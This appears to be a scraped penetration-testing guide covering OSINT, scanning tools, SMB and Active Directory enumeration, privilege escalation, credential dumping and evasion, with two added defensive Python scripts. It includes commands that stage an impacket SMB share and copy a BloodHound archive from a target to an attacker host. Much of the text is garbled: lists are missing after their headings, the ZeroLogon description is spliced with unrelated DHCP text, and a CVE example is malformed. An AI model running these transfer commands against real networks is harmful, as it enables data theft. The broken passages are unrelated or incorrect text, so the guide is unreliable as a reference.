So, what is penetration testing? It is sometimes called a lost art. It requires a deep understanding of operating systems like Windows or Linux and a solid grasp of the communication protocols we use daily on the internet. Besides that, we must have a broad understanding of the various stages of an actual penetration test. During a penetration test, we simulate a cyber-attack on computer systems. We also perform a vulnerability assessment to check whether the target systems contain any weak spots or misconfigurations that need to be patched. For auditing these systems, there are various frameworks and methodologies we can use to perform our penetration test.
For the penetration test itself, there are special distributions that aid the testing process and include many security assessment tools.
Before we go into any penetration test, ask yourself the following questions:
In which circumstances will the test get performed?
These are all questions we need to answer before starting any penetration engagement. Before beginning any engagement, read this guide for penetration testers; it has the complete list of things we should do during an engagement.
There is no such thing as an “unhackable” system, nor can any single system be secured unless all the interconnected systems that touch or access the infrastructure are also secured. Logic suggests that, to maximize effectiveness, an organization must implement multiple overlapping protection solutions that work together, so that the failure or circumvention of any single protection measure does not compromise the entire infrastructure.
What it means to be an ethical hacker or penetration tester: many people have asked what the difference is between a black hat and an ethical hacker. The answer comes down to ethics. Is it ethical to do the activities we are performing? If not, we are most likely doing hacking that is unethical and punishable by law. Common practices of black-hat hackers:
None of these practices are ethical, and they should not be performed by ethical hackers or penetration testers. Another important thing to understand is what impact the penetration test will have. Will it affect customers, employees, or maybe even production systems? It is crucial to measure and perform a risk assessment of all the critical systems to be tested during the penetration test. If any system goes down, we can be held accountable, and we might even get sued if it ends badly. So, to prevent this, make sure we know the network we are testing and have set boundaries for the systems we are allowed to test.
If we find a vulnerability in any company’s software, make sure to give the company notice and enough time to fix the issue. Once the company has permitted us to disclose the vulnerability, we can write it up and publish it on the internet. We could be sued for irresponsible disclosure if we do not follow these practices. It could be seen as a serious crime, so always be careful about what kind of information we disclose on the internet without proper research.
Most companies with a vulnerability disclosure program will offer a bug bounty if we find a critical vulnerability in their website or production servers. Most disclosure windows are between 60 and 90 days.
How do ethical hackers or penetration testers find these vulnerabilities? Usually, they use methods like static analysis, dynamic analysis, or fuzzing the application with random data. Once a vulnerability has been found, independent security researchers from a CVE authority will test and confirm our findings, and it will be assigned a CVE number, for example CVE-2022-001253. The first part indicates the year the vulnerability was found, and the second part is the order of the CVE.
Resources:
Some other handy websites to find CVEs
To find exploits or proof of concepts
Zero-day Vulnerability Database
Before we try to perform penetration tests on a company, we must perform OSINT (open-source intelligence) on the company’s in-scope assets. This method allows us to find a lot of information on the target. Here are a few websites that allow us to find target information.
Things we will be looking for during OSINT are commonly used passwords from data breaches, usernames, emails, and anything that could help gain a foothold into the company during the penetration test.
For extra information
Video:
The open-source intelligence revolution: Meet the kids outsmarting the CIA | Manas Chawla | TEDxLSE
Open-Source Intelligence (OSINT) in 5 Hours – Full Course – Learn OSINT!
During this phase, we go over active information gathering: we use common scanning tools and techniques to see what services and applications are running on the target hosts. This way we can see if the target we will attack is vulnerable to known exploits, or whether there are any common misconfigurations in the software or operating system deployment. Common tools we use for scanning the target hosts are:
Nmap is an advanced port scanner used to scan a network or a host. It enumerates which ports are open and what kind of services are running on them. Most of the work during a penetration test is enumeration, which is key to getting a foot in the door and eventually gaining initial access to a network. Nmap also has a large script library that you can use for everything from finding the general location of the target to executing a DoS attack.
Source
Video:
Nmap Tutorial for Beginners – 1 – What is Nmap?
Most of the tools listed above come with standard penetration testing distros. If they are not pre-installed, you can pull them from GitHub.
This tool (Netdiscover) discovers hosts on the network: it pulls down the IP addresses and MAC addresses of systems connected to the same subnet. It does this by listening to ARP (Address Resolution Protocol) traffic to find the live systems in the network.
Source
Netdiscover, ARP Scanner (official repository)
Video:
Using the NetDiscover Tool(Kali Linux Information Gathering part 1 )
This tool is a web proxy that intercepts traffic and lets us modify the requests sent. It allows us to send requests to a server that are typically not allowed, which can help us gain access to a targeted web server. Burp Suite is an especially useful tool for bug bounty hunters looking for vulnerabilities in a target. Burp Suite is most often used with the FoxyProxy extension in your preferred browser, which works by routing your browser’s requests through a certain port.
Source:
Burp Suite – Application Security Testing Software – PortSwigger
Video:
These are vulnerability scanners that search standard computer systems for known weaknesses. They do this with a list of known vulnerabilities to see if the computer is running any vulnerable software that could be exploited by a hacker or penetration tester.
Source:
Video:
Host Discovery & Vulnerability Scanning with Nessus
This tool (sqlmap) can perform automated SQL injection and take over databases. It can be useful for gaining access to a web server or a database server and dumping credentials to gain a foothold in the targeted system.
Video:
Web App Penetration Testing – #8 – SQL Injection With sqlmap
Source:
This tool is used for Fuzzing the targeted system with random data. It keeps sending random data to the web server until the tool finds a vulnerability or misconfiguration.
Source :
GitHub – xmendez/wfuzz : Web application fuzzer
Metasploit is one of the most common exploitation tools. It contains a lot of useful exploits and enumeration tools and makes the life of a penetration tester much easier.
Source:
GitHub – rapid7/metasploit-framework
Video:
Metasploit For Beginners – #1 – The Basics – Modules, Exploits & Payloads
This tool (Impacket) gets information on the Active Directory domain, such as the domain name. Impacket is a collection of Python classes for working with network protocols. It focuses on providing low-level programmatic access to packets and, for some protocols (e.g., SMB1-3 and MSRPC), the protocol implementation itself. Packets can be constructed from scratch and parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols.
Source:
Impacket is a collection of Python classes for working with network protocols.
Video:
Impacket GetUserSPNs & Kerberoasting Explained
Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services. Hydra can perform rapid dictionary attacks against more than 50 protocols.
Source:
Video:
How to use Hydra to brute force login pages
During the network enumeration process, we scan the network and determine how many systems are on the subnet. From there, we look at which operating systems are running and which TCP ports are open. From gathering and collecting all this information, we can draw a fairly accurate picture of what kind of system it is. The ports we are usually looking for are those of an Active Directory server. The command we use for this scan is:
Command:
nmap $ip -p- -T4 -A
The command will show us all the ports and services on the targeted host that Nmap can pull off it.
Ports that immediately stand out are:
SMB stands for Server Message Block. The default ports are 445 and 139. It allows clients, like workstations, to communicate with a server, for example to access a shared directory.
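As an added example (not part of the original article), here is a small Python parser for the grepable (-oG) output of the scan above that flags hosts whose open ports match an Active Directory domain controller. The scan text is constructed, and the port set DC_PORTS and the DC_REQUIRED rule are our own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of `nmap -p- -T4 -A -oG -` (grepable) output for two hosts; not real scan data.
SAMPLE_GREPABLE = """\
Host: 10.0.0.1 ()\tStatus: Up
Host: 10.0.0.1 ()\tPorts: 53/open/tcp//domain//Simple DNS Plus/, 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos/, 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP/, 445/open/tcp//microsoft-ds///, 636/open/tcp//ssl|ldap///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: filtered (65527)
Host: 10.0.0.25 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/\tIgnored State: closed (65533)
"""

# Ports that together point at an Active Directory domain controller (our own selection).
DC_PORTS = {53: "dns", 88: "kerberos", 135: "msrpc", 139: "netbios-ssn", 389: "ldap",
            445: "smb", 464: "kpasswd", 636: "ldaps", 3268: "gc", 3269: "gc-ssl"}
DC_REQUIRED = {88, 389, 445}  # Kerberos + LDAP + SMB on one host is the classic DC signature

# One grepable port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")

@dataclass
class HostReport:
    ip: str
    open_ports: dict = field(default_factory=dict)  # port -> (service, version)

    def ad_ports(self) -> list:
        return sorted(p for p in self.open_ports if p in DC_PORTS)

    def looks_like_dc(self) -> bool:
        return DC_REQUIRED.issubset(self.open_ports)

def parse_grepable(text: str) -> dict:
    """Parse nmap -oG output into {ip: HostReport}, keeping only open TCP ports."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        report = hosts.setdefault(ip, HostReport(ip))
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            if state == "open" and proto == "tcp":
                report.open_ports[int(port)] = (service, version)
    return hosts

def triage(text: str) -> list:
    """Return one summary line per host, DC candidates first."""
    hosts = parse_grepable(text)
    ranked = sorted(hosts.values(), key=lambda h: (not h.looks_like_dc(), h.ip))
    return [f"{h.ip}: {'LIKELY DC' if h.looks_like_dc() else 'other'} "
            f"open={sorted(h.open_ports)} ad_ports={h.ad_ports()}" for h in ranked]

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_GREPABLE)))
```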
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
The -N flag runs the query as an anonymous user (no password prompt), and -U authenticates as the given username. A workgroup can also be specified.
On your local Kali machine, make a directory that you want the file to go into.
mkdir smb
Next, from inside that directory, we will run impacket-smbserver:
sudo impacket-smbserver -smb2support share $(pwd)
Then, from the target, we will transfer the file over to the share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\
We chose to show the transfer of a BloodHound zip file, because BloodHound is very important when enumerating AD.
Video:
NetBIOS And SMB Enumeration – Nbtstat & smbclient
Extra sources: SPN Scanning – Service Discovery without Network Port Scanning – Active Directory Security
Credits for information to: GitHub – infosec n1nja/AD-Attack-Defense: Attack and defend active directory using modern post exploitation adversary tradecraft activity
During this phase, attackers will try to enumerate the services. They can do the following:
Performs service discovery via LDAP queries to a domain controller
Data mining is finding anomalies, patterns, and correlations within large data sets to predict outcomes. Using a broad range of techniques, it can use this information to increase revenues, cut costs, improve customer relationships, reduce risks, and more.
User hunting tracks where users are logged in or have a session in the network. By locating their login or session, we might gain access to that machine, privilege escalation (if required), and operate in the context of the new user. It is most helpful with elevated user accounts.
Video:
Active Directory Enumeration with BloodHound
Active Directory Enumeration with PowerView
AppLocker advances the application control features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules that allow or deny apps from running based on unique identities of files, and to specify which users or groups can run those apps.
Active Directory Federation Services (AD FS), a software component developed by Microsoft, can run on Windows Server operating systems to provide users with single sign-on access to systems and applications located across organizational boundaries. It uses a claims-based access-control authorization model to maintain application security and implement federated identity.
To gain initial access, we must find a way into the server. There are multiple ways to get a foothold on the target. There are privileged (authenticated) ways and unauthenticated ways to gain access to a remote target. The methods below do not require authentication with the web server.
These attack methods require a Ncat listener to listen for incoming connections. Usually, with command injection, the attacker injects a command into a text field that gets executed and creates a Ncat connection back to the attacker’s machine. Some of the attacks will require credentials to gain access.
Usually, to gain access to authenticated services, the attacker can deploy several attack methods:
Common attack tools that will be used are:
Privilege escalation is the process of moving to a higher-privileged account; this can be done horizontally or vertically.
ZeroLogon (formally: CVE-2020-1472) is a critical vulnerability in Microsoft’s authentication protocol Netlogon, as implemented, prevents fake DHCP servers from infiltrating the network and rerouting
The password for the local admin can be found by looking through all the scripts in the SYSVOL folder.
Kerberos is a computer-network authentication protocol that works based on tickets to allow nodes communicating over a non-secure network to prove their identity to one another securely.
Members of the DNSAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects.
Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user and computer accounts. Group Policy provides centralized management and configuration of operating systems, applications, and users’ settings in an Active Directory. We can try the following:
Microsoft Exchange Server is a mail server and calendaring server. It runs exclusively on Windows Server operating systems.
Allow attackers to steal hashed versions of user passwords and relay clients’ credentials to authenticate to servers.
Attackers can escalate privileges with vulnerabilities like stack overflows, stack strings, race conditions, use-after-free, and arbitrary writes. Stack overflows can be used to achieve code execution. Stack strings can be used to view memory in the program, which may leak data like passwords. A race condition may allow an attacker to run a program’s function twice at the same time, which may allow modification of a variable that controls access. Use-after-free and arbitrary write could allow an attacker to modify data that is later used in a buffer overflow attack.
To circumvent security controls and conceal their actions on compromised systems, attackers use defense evasion techniques. For example, encryption can be used to evade detection, malware can be disguised, and legitimate system tools can be used maliciously. Defense evasion is aimed at making detection and response more difficult for defenders. Cybersecurity experts often see privilege escalation and persistence used in conjunction with this concept.
Credential dumping is the process of extracting credentials from a system and writing them to disk or a network location so they can be used for further exploitation.
LSASS dumping is a technique used by attackers to extract sensitive information from the LSASS process. This can include sensitive information such as hashed user passwords, password policy information, and security tokens. The LSASS process stores this information in memory, and attackers can use specialized tools to dump the contents of the LSASS process memory into a file.
An attacker uses Pass the Hash (PtH) to authenticate to a remote system or service using the hash of the password rather than the plaintext password. This works because Windows systems store password hashes in memory, and these hashes can be used directly for authentication.
In password spraying, attackers try a single, common password against many user accounts to gain unauthorized access to a system or network. In contrast, brute-force attacks attempt to guess the correct password for an account by trying many different passwords.
To gain Domain Admin access through privilege escalation techniques using Empire, an attacker would typically use modules built into the framework that automate common privilege escalation methods. These might include:
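As an added example (not from the original article), the following Python script tells the two patterns described above apart in a constructed set of failed-logon records: a password spray (one or two attempts across many accounts from one source) versus a brute-force attack (many attempts against one account). The simplified key=value record format, the thresholds and the window size are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records (Windows Security event 4625 = failed logon, 4624 = success),
# in a simplified key=value layout of our own, not the real EVTX/XML format.
SAMPLE_LOG = """\
2024-03-01T09:00:01 EventID=4625 TargetUserName=alice IpAddress=10.0.0.50
2024-03-01T09:00:03 EventID=4625 TargetUserName=bob IpAddress=10.0.0.50
2024-03-01T09:00:05 EventID=4625 TargetUserName=carol IpAddress=10.0.0.50
2024-03-01T09:00:07 EventID=4625 TargetUserName=dave IpAddress=10.0.0.50
2024-03-01T09:00:09 EventID=4625 TargetUserName=erin IpAddress=10.0.0.50
2024-03-01T09:01:00 EventID=4625 TargetUserName=admin IpAddress=10.0.0.77
2024-03-01T09:01:01 EventID=4625 TargetUserName=admin IpAddress=10.0.0.77
2024-03-01T09:01:02 EventID=4625 TargetUserName=admin IpAddress=10.0.0.77
2024-03-01T09:01:03 EventID=4625 TargetUserName=admin IpAddress=10.0.0.77
2024-03-01T09:01:04 EventID=4625 TargetUserName=admin IpAddress=10.0.0.77
2024-03-01T09:05:00 EventID=4625 TargetUserName=alice IpAddress=10.0.0.9
2024-03-01T09:05:30 EventID=4624 TargetUserName=alice IpAddress=10.0.0.9
"""

LINE_RE = re.compile(r"^(\S+) EventID=(\d+) TargetUserName=(\S+) IpAddress=(\S+)$")

def parse_failed_logons(text):
    """Return (timestamp, user, source_ip) tuples for event 4625 only, sorted by time."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(2) == "4625":
            events.append((datetime.fromisoformat(m.group(1)), m.group(3), m.group(4)))
    return sorted(events)

def classify_sources(events, window=timedelta(minutes=5), min_accounts=5, min_attempts=5):
    """Label each source IP 'spray' (many accounts, <= 2 tries each), 'bruteforce'
    (many tries on <= 2 accounts) or 'normal', using a sliding time window."""
    by_ip = defaultdict(list)
    for ts, user, ip in events:
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, evs in by_ip.items():
        verdict, start = "normal", 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # drop events older than the window
                start += 1
            counts = Counter(user for _, user in evs[start:end + 1])
            if len(counts) >= min_accounts and max(counts.values()) <= 2:
                verdict = "spray"
                break
            if sum(counts.values()) >= min_attempts and len(counts) <= 2:
                verdict = "bruteforce"  # keep scanning: a later spray verdict wins
        verdicts[ip] = verdict
    return verdicts
```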
Once the attacker has gained Domain Admin access, they would have complete control over the domain. They could access and manipulate all domain-level resources, including user accounts, group policies, and network resources.
In a remote weaponization of WSUS (MITM) attack, the attacker first gains access to the WSUS server, either by exploiting a vulnerability or by stealing login credentials. Once attackers have access to the WSUS server, they can manipulate the update process to perform MITM attacks. For example, the attacker may approve malicious updates to be deployed to network systems. Such an update can be malware that gives the attacker access to the systems, or a tool that performs MITM attacks.
During this phase, we will try everything to stay under the radar of the defenders, which means we must take certain steps to ensure we can always return to the box, for example by setting up different listeners. To stay on the target box, we will have to perform the following actions:
Resources
Persistence, Tactic TA0003 – Enterprise | MITRE ATT&CK®
To ensure the attacker is not detected, they can employ several techniques like code obfuscation or encryption to bypass traditional defenses. Here are some common techniques they use to obfuscate their payloads.
Sources
GitHub – oddcod3/Phantom-Evasion: Python antivirus evasion tool
Data masking – Wikipedia
Deobfuscating Python Code (PicoCTF 2022 #30 ‘bloat.py’)
It is recommended to follow the latest trends used by adversaries, which is why threat intelligence can help in defending your organization. Besides that, it is recommended to follow the latest best practices.
After we have established persistence on the target, we perform post-exploitation tasks, for example dumping credentials. Some tools we run to perform post-exploitation: